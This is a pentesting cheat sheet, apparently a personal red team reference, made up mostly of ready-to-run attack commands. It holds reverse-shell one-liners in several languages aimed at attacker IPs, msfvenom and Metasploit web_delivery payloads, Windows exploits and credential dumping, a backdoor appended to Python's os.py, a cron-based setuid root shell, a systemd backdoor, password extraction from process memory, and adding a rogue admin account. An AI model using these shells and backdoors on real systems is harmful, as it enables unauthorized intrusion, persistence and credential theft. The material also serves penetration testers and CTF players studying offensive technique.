 ############################################################################
 ####################### *** RED TEAM REFERENCE *** #########################
 ############################### by dead1 ###################################
 ############################################################################
 ######## QUICK PENTESTING REFERENCE FOR ENUMERATION & EXPLOITATION #########
 ############################################################################
 ############################# ** Got Root? ** ##############################
 ############################### ** 2019 ** #################################
 ############################################################################

########################################
#############  SCAN TOOLS  #############
########################################
 dirb http://0.0.0.0					[Directory Scan]
 nikto -h 0.0.0.0					[Website Scan]
 nmap -T4 -F 0.0.0.0					[Quick Scan]
 nmap -T4 -A -v 0.0.0.0					[Intense Scan]
 nmap -sn 0.0.0.0					[Ping Scan]
 nmap -p 1-65535 -T4 -A -v 0.0.0.0			[Intense, All TCP]
 nmap -sn --traceroute 0.0.0.0				[Quick Trace Route]

##########################################
#############  USEFUL TOOLS  #############
##########################################
 setoolkit						[Social Engineering Kit]
 burpsuite						[Reverse Website Engineering Framework]
 ghidra							[Reverse Engineering Software]
 zenmap							[Visual NMAP Application]
 maltego						[Social Engineering Research Program]
 dirb							[Directory Enumerator Website]
 nikto							[Website Scanner]
 xHydra							[Protocol Brute Force]
 johntheripper						
	john --wordlist=rockyou.txt password.txt	[Crack a Password]
	ssh2john id_rsa > id_rsa.hash			[SSH Hash Generator]
 responder -I wlan0 -wrfFPv				[NTLM Cred Grabber]
 responder -I wlan0 -wrf				[Less Force NTLM Cred Grabber]
 steghide extract -sf PICTURE				[Find hidden files in pictures]
 base64 -d FILE > newfile				[Base64]

#############################################
#############  USEFUL COMMANDS  #############
#############################################
 nc -lvnp 4444						[netcat]
 python -c 'import pty;pty.spawn("/bin/bash")'		[pyterminal]
 python -m SimpleHTTPServer 80	                        [pyhost]
 msfvenom -p PAYLOAD LHOST= LPORT= -f FORMAT > shell    [venom]

############################################
#############  REVERSE SHELLS  #############
############################################
 [bashshell] bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 [pyshell] python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.19",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 
 [perlshell] perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 [netcatshell] nc -e /bin/sh 10.0.0.1 1234 
		rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

 [rubyshell] ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 [phpshell] php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 

#################################################
#############  METASPLOIT PAYLOADS  #############
#################################################
 php/meterpreter/reverse_tcp
 python/meterpreter/reverse_tcp
 python/shell_reverse_tcp
 java/meterpreter/reverse_tcp
 windows/meterpreter_reverse_tcp
 cmd/windows/reverse_powershell
 payload/cmd/unix/reverse_bash

####################################################
#############  AUX METASPLOIT MODULES  #############
####################################################
 auxiliary/scanner/portscan/tcp				[TCP Port Scanner]
 msf > nmap -v 0.0.0.0 --script vuln -Pn -O		[VULN Scanner] 
 auxiliary/scanner/http/dir_scanner			[Web Directory Scanner]
 auxiliary/scanner/http/jboss_vulnscan			[JBOSS Vuln Scan]
 exploit/multi/http/jboss_maindeployer			[JBOSS Main Deployer]
 auxiliary/scanner/mssql/mssql_login			[SQL Cred Scanner]
 auxiliary/scanner/mysql/mysql_version			[SQL Version]
 exploit/windows/mssql/mssql_payload			[SQL Payload]
 auxiliary/scanner/oracle/oracle_login			[Oracle Login Module]
 auxiliary/scanner/ssh/ssh_login_pubkey			[Use PUBKey for Login]
	
################################################
#############  METASPLOIT COMMANDS #############
################################################
 msfdb reinit						[Reload Database]
 msfdb start						[Start Database]
 service postgresql start				[Start Postgres Instead]
 msfconsole						[Start Metasploit]
 exploit/multi/handler					[Meterpreter Setup]
 search <NAME>						[Lookup In Database]
 sessions						[List Sessions]
 sessions -i <NUMBER>					[Interact with Session]
 upload file c:\\windows				[Meterpreter Upload]
 download c:\\windows\\file /download			[Meterpreter Download]
 ps							[Metepreter Processes]
 hashdump						[Meterpreter Hashdump]
 msfconsole -m ~/secret-modules/			[Load Modules]
	msf > loadpath					[Load Modules]

########################################################
#############  WINDOWS METASPLOIT MODULES  #############
########################################################
 post/windows/manage/powershell/exec_powershell		[Powershell Execute]
 exploit/multi/script/web_delivery			[Powershell Payload]
 post/multi/recon/local_exploit_suggester		[Check for Simple Vulns]
 auxiliary/crawler/msfcrawler				[Modular Web Crawler]
 exploit/windows/smb/ms08_067_netapi			[XP,2003,XP][PWN]
 exploit/windows/dcerpc/ms06_040_netapi			[NT,XP][PWN]
 exploit/windows/smb/ms09_050_smb2_negotiate_func_index	[Vista][PWN]
 exploit/windows/local/bypassuac			[Bypass UAC on Win7][PWN]
 post/windows/gather/credentials/gpp			[Grab Passwords]
 post/windows/gather/local_admin_search_enum		[Enumerate Win Access]
 post/windows/gather/smart_hashdump			[SAM Files and ESC priv]
 post/windows/gatherenum_powershell_env			[Windows Enumeration]
 post/windows/gather/arp_scanner			[ARP Table]
 post/windows/gather/checkvm				[Check for VMS]
 post/windows/gather/credentials/credential_collector	[Hashes]
 post/windows/manage/migrate				[Migrate Memory]
 post/windows/gather/dumplinks				[Checks Recent Files]
 post/windows/gather/enum_applications			[Installed Applications]
 post/windows/gather/enum_logged_on_users		[Logged Users and PID]
 post/windows/gather/enum_shares			[Recently Used Shares]
 post/windows/gather/enum_snmp				[Checks for SNMP Config]
 post/windows/gather/hashdump				[Hashdump]
 post/windows/gather/usb_history			[Check USB History]
 post/windows/manage/delete_user USERNAME=hacker	[Delete User HACKER]

######################################################
#############  LINUX METASPLOIT MODULES  #############
######################################################
 post/linux/gather/checkvm				[Check for VMs]
 post/linux/gather/enum_configs				[Collects Configs]
 post/linux/gather/enum_network				[Collects Network Info]
 post/linux/gather/enum_protections			[Search Counter Software]
 post/linux/gather/enum_system				[Gathers System Info]
 post/linux/gather/enum_users_history			[Lists BASH,SQL,VIM History]

##############################################
#############  MSFVENOM PAYLOADS #############
##############################################
 msfvenom -p java/jsp_reverse_shell_reverse_tcp LHOST=<attacking_ip> LPORT=1234 -f war > reverse.war
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.22 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe
 msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f raw > shell.php
	cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
 msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.20 LPORT=4444 -f raw > shell.py
 msfvenom -p python/meterpreter_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f raw > shell.py

#############################################################	
##########  POWERSHELL/PHP WEB DELIVERY METASPLOIT ##########
#############################################################
 msfconsole -q -x 'use multi/script/web_delivery;set PAYLOAD windows/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set TARGET 2;set URIPATH dead;run -j'
 msfconsole -q -x 'use multi/script/web_delivery;set PAYLOAD windows/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set TARGET 1;set URIPATH dead;run -j'

##########################################################
#############  ENUMERATING WINDOWS COMMANDS  #############
##########################################################
 %SYSTEMDRIVE%\boot.ini					[File Readability]
 %WINDIR%\win.ini					[Incase boot.ini = 0]
 whoami							[Current User]
 whoami /all						[All Users]
 set							[Shows Enviroment Variables]
 systeminfo						[Outputs Large Info]
 qprocess *						[Processes]
 at							[Current Scheduled Tasks]
 schtask						[Current Accessible Tasks]
 net start						[List Services]
 tasklist						[Another PID Viewer]
 tasklist /m						[List Modules Use Processes]
 taskkill [/f] /pid <PID>				[Kill Process PID]
 net use						[Used to Map Networks]
 net config workstation					[Info on NETBIOS, Sser]
 net user %USERNAME% /domain				[Users Access to Domain]
 net localgroup administrators				[Prints Adminstrators]
 arp -a							[Other Devices on Network]
 route print						[Prints Route Table]
 gpresult /z						[Settings of Current System]
 type%WINDIR%\System32\drivers\etc\hosts		[Prints Host File]
 dir %PROGRAMFILES%					[Prints Program Files Dir]
 echo %COMPEC%						[Shows where cmd.exe]
 tree C:\/f /a > C:\output_of_tree.txt			[Prints Process Tree]
 dir \/s /b | find /I "searchstring"			[Search for a String]
 net localgroup administrators /add hacker		[Adds HACKER to Admins]
 browstat
 sc qc
 net time
 net file
 net session
 ipconfig /all
 ipconfig /displaydns
 netstat -bano
 netstat -s-p[tcp|udp|icpm|ip]
 netstat -r
 netstat -na | findstr:445
 netstat -nao | findstr LISTENING
 netsh diag show all
 net view
 net view /domain

########################################################
#############  ENUMERATING LINUX COMMANDS  #############
########################################################
 find / -type f -readable ! -executable -size 1033c     [Find Human Readable]
 find / -user [NAME] -group [NAME] -size [#]c		[Find User/Group Files]
 cat FILE | sort | uniq -u				[Fine Unique Strings]
 strings FILE | grep ""					[Fine String in Unreadable]
 cat FILE | base64 --decode/encode			[Decode/Encode In Base64]
 sudo -l						[Check SUDO Abilities]
 find / -perm -4000 2>/dev/null				[Check SUDO Abilities]
 ls -alhR /var/www/ 2>/dev/null				[Linux WebFiles]
 ls -alhR /srv/www/htdocs/ 2>/dev/null			[Linux WebFiles]
 ls -alhR /usr/local/www/apache22/data/			[Linux WebFiles]
 ls -alhR /opt/lampp/htdocs/ 2>/dev/null		[Linux WebFiles]
 id || (whoami && groups) 2>/dev/null			[Password Enumeration]
 cat /etc/passwd | cut -d: -f1				[Password Enumeration]
 cat /etc/passwd | grep "sh$"				[Password Enumeration]
 awk -F: '($3 == "0") {print}' /etc/passwd		[Password Enumeration]
 w							[Password Enumeration]
 last | tail						[Password Enumeration]
 gpg --list-keys					[Check Users]
 df -h							[Check Unmounted Disks]
 ls /dev | grep -i "sd"					[Check Unmounted Disks]
 cat /etc/fstab						[Check Unmounted Disks]
 lpstat -a# Check if there is any printer		[Check Unmounted Disks]
 netstat -punta						[Check Internal Ports]
 ss -t; ss -u						[Check Internal Ports]
 cat /etc/HOST /etc/hosts /etc/resolv.conf 2>/dev/null	[Network]
 dnsdomainname 2>/dev/null				[Network Information]
 cat /etc/networks 2>/dev/null				[Network Information]
 ifconfig 2>/dev/null || ip a 2>/dev/null		[Network Information]
 iptables -L 2>/dev/null				[Network Information]
 arp -e 2>/dev/null					[Network Information]
 route 2>/dev/null					[Network Information]
 netstat -punta 2>/dev/null				[Network Information]
 lsof -i						[Network Information]

###############################################################
#############  FIND WRITEABLE FILES [LINUX POST]  #############
###############################################################
 find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq
 for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done

##############################################################
#############  FIND PASSWORD FILES [LINUX POST]  #############
##############################################################
 grep -lRi "password" /home /var/www /var/log 2>/dev/null | sort | uniq 
 grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq 

##############################################################################
#############  HIGHJACKING PYTHON LIBRARY BACKDOOR [LINUX POST]  #############
##############################################################################
	[To backdoor library add at the end of the os.py library]
 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

#########################################################
#############  SCHEDULED JOBS [LINUX POST]  #############
#########################################################
 crontab -l
 ls -al /etc/cron* /etc/at*
 cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

############################################################
#############  WRITE TO CRON JOB [LINUX POST]  #############
############################################################
 echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
	[Wait until it is executed]
 /tmp/bash -p

#################################################################
#############  TOM CAT SERVER REWRITE [LINUX POST]  #############
#################################################################
	/etc/systemd/ # modify following values
 ExecStart=/path/to/backdoor
 User=root
 Group=root

#########################################################
#############  PROCESS MEMORY [LINUX POST]  #############
#########################################################
 gdb -p <FTP PROCESS_PID>
 (gdb) info proc mappings
 (gdb) q
 (gdb) dump memory /tmp/mem_ftp <START_HEAD> <END_HEAD>
 (gdb) q
 strings /tmp/mem_ftp #User and password

###################################################################
#############  SCAN FOR USEFUL SOFTWARE [LINUX POST]  #############
###################################################################
 which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 perl php ruby xterm doas sudo fetch 2>/dev/null

##########################################
#############  HASH LENGTHS  #############
##########################################
 MD5			[16 Bytes]
 SHA-1			[20 Bytes]
 SHA-256		[32 Bytes]
 SHA-512		[64 Bytes]

########################################
#############  CONFIG SSH  #############
########################################
 nano /etc/ssh/sshd_config
 systemctl restart ssh
 cat /etc/ssh/sshd_config | grep 

###############################################
#############  FILE TRANSFER SSH  #############
###############################################
 scp /local/[FILE] user@0.0.0.0:/home/user/	[SEND FILE]
 scp user@0.0.0.0:/home/user/[FILE] /Local/	[RECIEVE FILE]

#################################################
#############  MONITOR SERVER LOGS  #############
#################################################
 tail -f /var/log/auth.log | grep sshd
 cat /var/log/auth.log | grep sshd

#################################
#############  UFW  #############
#################################
 ufw status verbose
 sudo ufw default deny incoming
 sudo ufw default allow outgoing
 ufw deny PORT
 ufw allow PORT && ufw status verbose
 ufw deny from ADDRESS
 ufw allow ssh
 ufw allow http
 ufw allow https
 
